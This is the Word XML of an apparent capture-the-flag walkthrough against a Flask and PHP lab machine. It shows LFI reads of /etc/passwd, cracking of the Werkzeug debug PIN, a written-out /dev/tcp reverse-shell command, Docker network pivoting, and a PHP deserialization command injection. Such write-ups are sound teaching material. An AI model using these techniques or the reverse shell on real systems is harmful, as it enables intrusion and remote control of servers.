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Forfun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svnfd7mh7exp"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cimk73tpibuu"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600200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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600200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>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opening our browser and accessing port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we found a website consisting of a blog containing various articles.</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84600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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fuzzing on the application using the tool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we identified a relevant finding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/console, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">his route corresponds to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Werkzeug debug interface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4800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="83"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82"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If we obtain the PIN, we will be able to execute commands remotely through the debug console.</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some research, we identified an exploit that allows us to reverse the PIN generation algorithm. As a result, we can gain access to the console.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug</w:t>
        </w:r>
      </w:hyperlink>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to achieve this, it is crucial to read certain files from the server.</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route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tips </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it becomes clear that we can download the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tips.pdf</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Additionally, noticing the query string </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tips?download= </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which is typical of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability, we can attempt to exploit file reading here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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performing a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we successfully read the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd:</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06800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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editing the script, but for that we need some information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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 the user who started Flask</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modname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → flask.app</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getattr(app, 'name', getattr(app.__class__, 'name'))</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Flask</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getattr(mod, 'file', None)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → absolute path of app.py</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uuid.getnode()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → MAC address of the current machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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/etc/machine-id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → unique machine identifier</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obtain the absolute path of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">app.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by accessing the article titled </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"the-metaverse"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since the corresponding HTML file does not exist, Flask returns an error, consequently revealing useful information due to debug mode being enabled.</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Obtaining the user who started Flask:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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723900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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Obtaining the MAC address of the server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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333500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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finally, retrieving the machine identifier:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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49400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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collecting all the necessary information, we substitute them into the exploit script.</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81500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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6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providing the PIN, we gain access to the console.</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send a reverse shell payload to establish a shell connection on the server:</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__import__('os').system("/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'")</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3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816100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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5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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2057400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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35">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading the simple shell to fully interactive TTY:</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625600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="89"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enumeration on the server, we did not initially find anything relevant.</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when executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname -I, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we noticed the Docker network IP (for example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172.17.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). With this information, we can scan the Docker network to identify additional hosts.</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a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">static nmap binary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B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap</w:t>
        </w:r>
      </w:hyperlink>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Nmap, we transfer it to the server using Python as a temporary HTTP server.</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90"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7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17907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IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.17.0.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we perform a port scan and identify port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as open.</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5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need to use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 to perform port forwarding, allowing us to redirect that port to our local machine and access the application through our browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId30">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our local machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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49400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81"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server:</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R:8000:172.17.0.2:80</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511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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access the application locally at:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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527300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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login bypass techniques without success, we performed fuzzing.</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5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a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Git Exposed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability. We can use the following tool to dump the repository:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/carlosevieira/git-dumper</w:t>
        </w:r>
      </w:hyperlink>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examining the dumped PHP files, we identified an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insecure deserialization vulnerability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the application performs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unserialize() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on a cookie.</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75"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Analyzing the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LogManager.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we observe that we control the property </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$path.</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__destruct()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function concatenates this path into a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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> call, creating a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command injection vulnerability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> during object destruction.</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64"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allows arbitrary command execution by manipulating the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> property through insecure deserialization.</w:t>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85"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preparing our payload, we start the Netcat listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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108200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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inject our malicious payload into the cookie and reload the page.</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77"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receive a shell connection.</w:t>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58"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can execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
